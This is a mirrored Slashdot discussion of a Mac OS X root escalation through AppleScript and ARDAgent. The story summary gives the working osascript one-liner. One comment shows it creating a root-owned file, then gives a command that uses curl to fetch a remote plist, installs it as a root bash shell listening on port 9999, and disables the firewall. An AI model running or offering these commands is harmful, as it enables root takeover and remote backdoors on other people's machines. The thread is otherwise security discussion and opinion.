Slashdot Mirror

← Back to Stories (view on slashdot.org)

Mac OS X Root Escalation Through AppleScript

Posted by timothy on from the oh-snap-crispy-apples dept.

An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

6 of 359 comments (clear)

  1. Re:Physical access? by MyDixieWrecked · · Score: 4, Interesting

    Actually... interesting.

    I wasn't switched to via fastuserswitching, but I do lock my screen. that seems to have an impact on it, too.

    I ssh'd into my box at home and running this was successful.

    fwiw, osascript doesn't work if the user isn't logged into aqua. I've tried writing volume controller scripts and I tried scripting Unison and other applications and they don't work if you're not logged in physically at the machine.

    So basically, an exploit would need to be fired by the user or by something the user did (ie: surf to a website).

    This is interesting.

    --



    ...spike
    Ewwwwww, coconut...
  2. Re:This is a serious privilege escalation bug, but by Bert64 · · Score: 4, Interesting

    No, what's good about Linux, and to a slightly lesser extend OSX, is that Unix is an incredibly simple system at it's core, so there are relatively few possible exploitation vectors and they are all well understood.

    --
    http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  3. Re:ARDagent by generica1 · · Score: 4, Interesting

    My apologies. There was no article sourced in the posting and I couldn't recreate the exploit on any of the Macs in my house via SSH *or* with local physical access via Terminal.app. I kept getting:

    23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

    No matter whether I tried ssh from remote, or local console bash.

    Tested on a MacBook Pro running 10.5.3, an iBook running 10.4.11 and a g5 PPC OS X Server running 10.4.11 (Server build).

    So....YMMV....

    --
    JUMP JUMP JUMP JUMP JUMP JUMP JUMP JUMP IRRIGATE
  4. Intellectual Honesty by JeffSpudrinski · · Score: 5, Interesting

    Firstly, I want to say I'm impressed.

    I'm not a Windows Fanatic or a MacEvangelist. I use both Windows and OSX and they both have strengths and weaknesses.

    I've seen waaay too many posts here and abroad about vulnerabilities in every OS out there. They are an unfortunate fact of life the IT Universe. However, too many times, when info is posted about Windows vulnerabilities MacEvangelists scream about how secure OSX is and and how Windows stinks. Conversely, when a vulnerability for OSX is posted, many of the same users write it off as a non-issue, too hard to execute, or some problem with the user's configs rather than an actual vulnerability.
    I have seen more than the normal number of folks, however, responding to this article with honesty about this exploit and even testing it further. (Let's just hope the underpaid Apple engineers [see other article about that] are listening).

    There are those here, though, who seem intent on writing this off as a non-exploit or trying to explain it away. That's where a concept known as "Intellectual Honesty" comes into play. You have to be honest with yourself about what you know and do. Viruses are a fact of life on computers and, while Apple is closed architecture (which by its very nature makes it MUCH more secure than other OSes), it's only a matter of time before real viruses appear for the Apple platform that just won't be able to be explained away.

    This article's exploit is a dangerous one to be sure and there are several equivalent Windows bugs. However, for all it's faults, Microsquash does a reasonable job of patching vulnerabilities carefully. Sometimes patching them right takes a little more time than users like, but the patches usually address the problems (although they do sometimes introduce more).

    Apple does an "okay" job of patching vulnerabilities, once they admit that they exist.

    There's another article about "carpet bombing" attacks via Safari and IE in Windows, and the responders there are perfect examples of the problems I refer to. A goodly number of them seem to be intent that the problem is Windows' fault and not a problem in Safari. Windows has issues, but the security problems exist in the program that's running and it's the programmer's duty to make sure that the APIs and such are called correctly and not in a manner to allow exploit to occure (too many programmers take easy shortcuts that introduce vulnerabilities).

    I hate to think it, but I will probably get the ever lovin' crap flamed out of me for saying all of this.

    Let me re-iterate. I'm impressed by a lot of the responders here with the unusually high level of Intellectual Honesty from Mac users than I have seen in the past. Let's hope the trend continues.

    p.s. I love the "security is like sex" comment above. Well put.

  5. Re:ARDagent by Sentry21 · · Score: 5, Interesting
    Disconfirmed - I don't have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

    dan@Geelong:~$ ls -lh /etc/somefile
    ls: /etc/somefile: No such file or directory
    dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
    dan@Geelong:~$ ls -lh /etc/somefile
    -rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
    dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
    dan@Geelong:~$ ls -lh /etc/somefile
    ls: /etc/somefile: No such file or directory     So, how dangerous is this? Here's an example:

    osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

    This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.

    To remove, run 'launchctl unload com.apple.bash' 'launchctl unload /System/Library/LaunchDaemons/bash.plist' and then 'rm /System/Library/LaunchDaemons/bash.plist'

    It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that's easily bypassed with a Python script.

    So yeah; anything can be downloaded, and anything can be done with it. Scary.
  6. Re:This is a serious privilege escalation bug, but by argent · · Score: 4, Interesting
    KDE opens a dialog and asks you if you want the CD to be mounted

    I call those "Should I do something stupid" dialogs.

    Given that:

    * The answer should almost always be "no".
    * It's less hassle if it doesn't ask, just doesn't do it.
    * Users get trained to answer "yes", because they keep getting them.

    Any time you're putting up "Should I do something stupid" dialogs, you're making things easy for people who are trying to use social engineering to install malware.

    Here's the history of Apple's experiment with stupid security dialogs in Safari:

    http://scarydevil.com/~peter/io/osx-security.html
    http://scarydevil.com/~peter/io/apple.html
    http://scarydevil.com/~peter/io/apple3.html
    http://scarydevil.com/~peter/io/apple4.html

    They finally wised up, and removed the "doing something really stupid" bit, by turning off "open Safe files" by default.

    Microsoft's been in denial about the same thing since 1997.

    http://scarydevil.com/~peter/io/airlines.html

    Windows Airlines:
    The terminal is very neat and clean, with security barriers every few meters. The attendants are attractive, even if it's kind of creepy how much they want to "help" (especially in the restrooms). The pilots are allegedly very capable, though nobody ever sees them and there's an armed guard by the cockpit door. The fleet of jets it operates are immense. Your jet takes off without a hitch, pushing above the clouds, and at 20,000 feet a message pops up on the seat back in front of you asking "Should this plane explode now?".

    Some idiot always answers "Yes".


    Windows is so much worse than everyone else that people tend to ignore it when Apple or KDE does something slightly less stupid than ActiveX, but it's still stupid, and putting up a "should this plane explode now?" dialog doesn't eliminate the stupidity.